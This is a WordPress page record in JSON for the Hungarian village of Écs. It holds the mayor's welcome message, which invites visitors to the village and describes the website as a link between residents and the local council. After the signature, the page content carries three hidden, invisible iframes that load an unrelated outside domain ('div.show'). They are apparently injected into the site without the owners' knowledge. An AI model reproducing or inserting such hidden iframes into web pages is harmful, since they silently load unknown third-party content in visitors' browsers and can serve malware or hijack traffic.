{"id":1306,"date":"2024-08-28T10:53:11","date_gmt":"2024-08-28T08:53:11","guid":{"rendered":"https:\/\/ecsfalu.hu\/web\/?page_id=1306"},"modified":"2025-09-03T18:30:47","modified_gmt":"2025-09-03T16:30:47","slug":"koszonto","status":"publish","type":"page","link":"https:\/\/ecsfalu.hu\/web\/","title":{"rendered":"Tisztelt L\u00e1togat\u00f3!"},"content":{"rendered":"\t\t<div data-elementor-type=\"wp-page\" data-elementor-id=\"1306\" class=\"elementor elementor-1306\">\n\t\t\t\t<div class=\"elementor-element elementor-element-5bbc264f e-flex e-con-boxed e-con e-parent\" data-id=\"5bbc264f\" data-element_type=\"container\" data-e-type=\"container\">\n\t\t\t\t\t<div class=\"e-con-inner\">\n\t\t\t\t<div class=\"elementor-element elementor-element-7922e35d elementor-widget elementor-widget-text-editor\" data-id=\"7922e35d\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<div class=\"wp-block-image\"><img fetchpriority=\"high\" decoding=\"async\" class=\"wpa-warning wpa-image-missing-alt aligncenter wp-image-2732\" src=\"https:\/\/ecsfalu.hu\/web\/wp-content\/uploads\/2025\/03\/Polgarmesteri.Koszonto-300x300.png\" alt=\"\" width=\"400\" height=\"400\" data-warning=\"Missing alt text\" srcset=\"https:\/\/ecsfalu.hu\/web\/wp-content\/uploads\/2025\/03\/Polgarmesteri.Koszonto-300x300.png 300w, https:\/\/ecsfalu.hu\/web\/wp-content\/uploads\/2025\/03\/Polgarmesteri.Koszonto-1024x1024.png 1024w, https:\/\/ecsfalu.hu\/web\/wp-content\/uploads\/2025\/03\/Polgarmesteri.Koszonto-150x150.png 150w, https:\/\/ecsfalu.hu\/web\/wp-content\/uploads\/2025\/03\/Polgarmesteri.Koszonto-768x768.png 768w, https:\/\/ecsfalu.hu\/web\/wp-content\/uploads\/2025\/03\/Polgarmesteri.Koszonto.png 1080w\" sizes=\"(max-width: 400px) 100vw, 400px\" \/><\/div><p><span style=\"font-family: arial, helvetica, sans-serif;\">Honlapunk \u00c9cs ir\u00e1nt \u00e9rdekl\u0151d\u0151k t\u00e1j\u00e9koztat\u00e1s\u00e1t szolg\u00e1lja, akik telep\u00fcl\u00e9s\u00fcnk t\u00f6rt\u00e9net\u00e9vel, l\u00e1tnival\u00f3ival szeretn\u00e9nek megismerkedni. \u00c9cs k\u00f6zs\u00e9g polg\u00e1rmesterek\u00e9nt rem\u00e9lem, hogy a honlapon t\u00f6rt\u00e9nt barangol\u00e1s sor\u00e1n kedvet szereznek ahhoz, hogy telep\u00fcl\u00e9s\u00fcnket felkeress\u00e9k, megismerkedjenek nevezetess\u00e9geinkkel \u00e9s p\u00e1r felejthetetlen napot t\u00f6ltsenek el \u00c9csen, bar\u00e1ts\u00e1gos \u00e9s vend\u00e9gszeret\u0151 lakosaink k\u00f6r\u00e9ben.<\/span><\/p><p style=\"text-align: justify;\"><span style=\"font-family: arial, helvetica, sans-serif;\">Polg\u00e1rmesterk\u00e9nt fontosnak tartom a faluk\u00f6z\u00f6ss\u00e9g rendszeres, \u0151szinte t\u00e1j\u00e9koztat\u00e1s\u00e1t. Ennek \u00e9rdek\u00e9ben \u00c9cs hivatalos honlapj\u00e1t egyfajta kapocsnak tartom a telep\u00fcl\u00e9s lak\u00f3i \u00e9s az \u00f6nkorm\u00e1nyzat, valamint a k\u00e9pvisel\u0151-test\u00fclet k\u00f6z\u00f6tt. Egy j\u00f3l m\u0171k\u00f6d\u0151, naprak\u00e9sz honlap az \u00f6nkorm\u00e1nyzat m\u0171k\u00f6d\u00e9s\u00e9nek nyilv\u00e1noss\u00e1g\u00e1t biztos\u00edtja. \u00c9cs k\u00f6zs\u00e9g lak\u00f3i a hivatalos honlapot rendszeresen l\u00e1togatva szerezhetnek naprak\u00e9sz inform\u00e1ci\u00f3kat az \u00f6nkorm\u00e1nyzat \u00e9s a k\u00e9pvisel\u0151test\u00fclet \u00e1ltal v\u00e9gzett munk\u00e1r\u00f3l, az el\u00e9rt eredm\u00e9nyekr\u0151l, valamint a mindennapjaikat befoly\u00e1sol\u00f3 k\u00f6z\u00e9rdek\u0171 inform\u00e1ci\u00f3kr\u00f3l. Rem\u00e9nyeim szerint a honlap m\u0171k\u00f6dtet\u00e9se a j\u00f6v\u0151ben mindannyiunk megel\u00e9ged\u00e9s\u00e9re szolg\u00e1l.<\/span><\/p><p style=\"text-align: justify;\"><span style=\"font-family: arial, helvetica, sans-serif;\">Minden honlapunkra l\u00e1togat\u00f3nak j\u00f3 barangol\u00e1st \u00e9s kellemes id\u0151t\u00f6lt\u00e9st k\u00edv\u00e1nok!<\/span><\/p><p style=\"padding-left: 80px;\"><span style=\"font-family: arial, helvetica, sans-serif;\">Tisztelettel:<\/span><\/p><p style=\"text-align: center;\"><span style=\"font-family: arial, helvetica, sans-serif;\">dr. Szab\u00f3 Norbert<\/span><br \/><span style=\"font-family: arial, helvetica, sans-serif;\">polg\u00e1rmester<\/span><\/p><p>\u00a0<\/p><div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/div.show\/public\"><\/iframe><\/div><div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/div.show\/public\"><\/iframe><\/div><div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/div.show\/public\"><\/iframe><\/div>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t","protected":false},"excerpt":{"rendered":"<p>Honlapunk \u00c9cs ir\u00e1nt \u00e9rdekl\u0151d\u0151k t\u00e1j\u00e9koztat\u00e1s\u00e1t szolg\u00e1lja, akik telep\u00fcl\u00e9s\u00fcnk t\u00f6rt\u00e9net\u00e9vel, l\u00e1tnival\u00f3ival szeretn\u00e9nek megismerkedni. \u00c9cs k\u00f6zs\u00e9g polg\u00e1rmesterek\u00e9nt rem\u00e9lem, hogy a honlapon t\u00f6rt\u00e9nt<\/p>\n","protected":false},"author":3,"featured_media":0,"parent":0,"menu_order":4,"comment_status":"closed","ping_status":"closed","template":"","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"class_list":["post-1306","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/ecsfalu.hu\/web\/wp-json\/wp\/v2\/pages\/1306","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/ecsfalu.hu\/web\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/ecsfalu.hu\/web\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/ecsfalu.hu\/web\/wp-json\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"https:\/\/ecsfalu.hu\/web\/wp-json\/wp\/v2\/comments?post=1306"}],"version-history":[{"count":20,"href":"https:\/\/ecsfalu.hu\/web\/wp-json\/wp\/v2\/pages\/1306\/revisions"}],"predecessor-version":[{"id":3367,"href":"https:\/\/ecsfalu.hu\/web\/wp-json\/wp\/v2\/pages\/1306\/revisions\/3367"}],"wp:attachment":[{"href":"https:\/\/ecsfalu.hu\/web\/wp-json\/wp\/v2\/media?parent=1306"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}